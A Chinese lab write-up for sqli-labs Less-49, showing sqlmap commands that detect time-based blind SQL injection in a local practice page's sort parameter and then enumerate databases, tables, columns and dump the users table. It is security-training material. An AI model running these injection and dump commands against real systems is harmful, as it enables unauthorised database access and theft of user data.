sqli-labs-Less-49

heze092026-03-17 9:17

SQLI-LAPS 实验记录

Less-49

这一关与上一关类似,也是盲注,页面上没有任何反馈信息,同样我们采用sqlmap工具来帮助进行自动化注入。

首先我们在命令行中输入sqlmap命令:

sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch

结果如图所示,只有时间盲注方式可以选择,接下来我们继续采用sqlmap自动化注入。

sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch --dbs

结果如图所示,页面返回数据库的名称,注入有效。

之后,我们可以继续使用sqlmap注入的方式,对表名、列名等内容进行注入。

  • 爆出表名:
php 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch -D security --tables
  • 爆出列名:
php 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch -D security -T users --columns
  • 爆出内容:
php 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch -D security -T users --dump
相关推荐
电子科技圈3 分钟前
芯科科技在蓝牙亚洲大会展示汽车与边缘AI前沿蓝牙创新技术, 解锁车用、家居、健康及工商业等应用场景
人工智能·科技·嵌入式硬件·mcu·物联网·网络安全·汽车
有味道的男人26 分钟前
对接亚马逊平台接口,商品全量信息一键抓取
数据库
Web极客码44 分钟前
2026年Linux VPS安全加固清单:SSH、防火墙与审计就绪配置
运维·服务器·数据库
大方子2 小时前
【好靶场】有点儿用的图形验证码
网络安全·好靶场
能年玲奈喝榴莲牛奶2 小时前
记一次挖矿病毒应急
网络安全·应急响应
逻辑驱动的ken2 小时前
Java高频面试考点18
java·开发语言·数据库·算法·面试·职场和发展·哈希算法
qq_392690662 小时前
Redis怎样应对Redis集群整体宕机带来的雪崩
jvm·数据库·python
网络安全许木3 小时前
自学渗透测试第30天(第一阶段总结与Metasploitable3部署)
网络安全·渗透测试
快乐非自愿3 小时前
Redis--SDS字符串与集合的底层实现原理
数据库·redis·缓存
这儿有一堆花3 小时前
住宅代理(Residential Proxy)技术指南
开发语言·数据库·php
热门推荐
01GitHub 镜像站点02要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法03Codex 接入 DeepSeek API 完整配置文档04【AI】2026 年具身智能模型和世界模型总结052026年4月AI大事件深度解读:大模型竞争进入“深水区“06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07实测可用|小米 MiMo 百万亿 Token 免费领,开发者速冲08近期有什么ai的新消息,新动态? 2026.4月092026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot10在Windows 11上安装Docker的踩坑记录